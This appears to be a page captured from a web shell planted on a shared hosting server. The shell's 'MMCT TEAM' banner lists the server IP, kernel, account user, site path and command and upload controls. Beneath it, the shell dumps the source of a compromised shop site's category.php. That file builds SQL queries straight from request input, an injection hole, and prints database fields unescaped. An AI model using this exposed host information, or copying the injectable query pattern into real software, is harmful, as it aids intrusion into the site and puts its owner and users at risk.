MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 18.217.118.7
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/thewebshop.co.in/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/thewebshop.co.in/category.php
<?php include_once 'site-header.php'; ?>
   <body>
<?php include_once 'header-top.php';?>  
 
<?php include_once 'header-menu.php';?>   
    

      <div class="clearfix"></div>
<?php
$cat_id=db_scalar("select category_id from tbl_category where category_url='$_REQUEST[cat_name]'");
$cat_sql=db_query("select * from tbl_category where category_id='$cat_id'");
$cat_res=mysqli_fetch_array($cat_sql);
?>
     
      <style>
		   .trmcd h4{position: relative; top:10px;}
	   </style>
      <section class="my-breadcrumb parallex">
         <div class="container page-banner">
            <div class="row">
               <div class="col-sm-6 col-md-6">
                  <h1><?=$cat_res['category_name']?></h1>
               </div>
               <div class="col-sm-6 col-md-6">
                  <ol class="breadcrumb pull-right">
                     <li><a href="http://www.thewebshop.co.in">Home</a></li>
                     <li class="active"><?=$cat_res['category_name']?></li>
                  </ol>
               </div>
            </div>
         </div>
      </section>

	   <style>
		   .posty {
    position: relative  !important;
    top: -70px !important;
}
		   @media (min-width:320px) and (max-width:767px) 
{
	.posty {
    position: relative !important;
    top: 400px !important;
}
}
	   </style>
	   <!------------>
	   <div id="web-designing" class="posty"></div>
	   <section class="">
         <div class="container">
            <div class="row">
            <div class="heading-2 col-md-12">
            <h2><?=$cat_res['category_name']?></h2>
            </div>
               <div class="col-md-7 col-sm-12 col-xs-12">
               	<?=$cat_res['category_description']?>
              <!--     <p>The Web Shop is Delhi based leading Digital Marketing Company, We provide best quality responsive website designing services. As a best Website design company in New Delhi India, We provide website designing packages on effective prices to our clients.</p> -->
                  <div class="col-md-6">
<?php
$web_query=db_query("select * from tbl_category where category_status='Active' and category_parent_id='$cat_res[category_id]'");
$rows=mysqli_num_rows($web_query);
$count=ceil($rows/2);

?>

                  <ul class="web-lst">
<?php
$web_q=db_query("select * from tbl_category where category_status='Active' and category_parent_id='$cat_res[category_id]' order by category_id asc limit 0,$count");
while($web_res=mysqli_fetch_array($web_q))
	{?>
<li><?=$web_res['category_name']?></li>
<?php }?>
 </ul>
                  </div>
               <div class="col-md-6">
                  <ul class="web-lst">  
                  	<?php
$web_q1=db_query("select * from tbl_category where category_status='Active' and category_parent_id='$cat_res[category_id]' order by category_id asc limit $count,$rows");
while($web_res1=mysqli_fetch_array($web_q1))
	{?>
<li><?=$web_res1['category_name']?></li>
<?php }?>

               </ul></div>
               </div>
               <div class="col-md-5 col-sm-6 hidden-sm">
                  <img src="uploaded_files/<?=$cat_res[category_image_name]?>" class="wdt-img" alt="">
               </div>
            </div>
         </div>
      </section>
     
	 

     
     
     
      
   
	   
   
      <?php include_once 'site-footer.php';?>

MMCT - 2023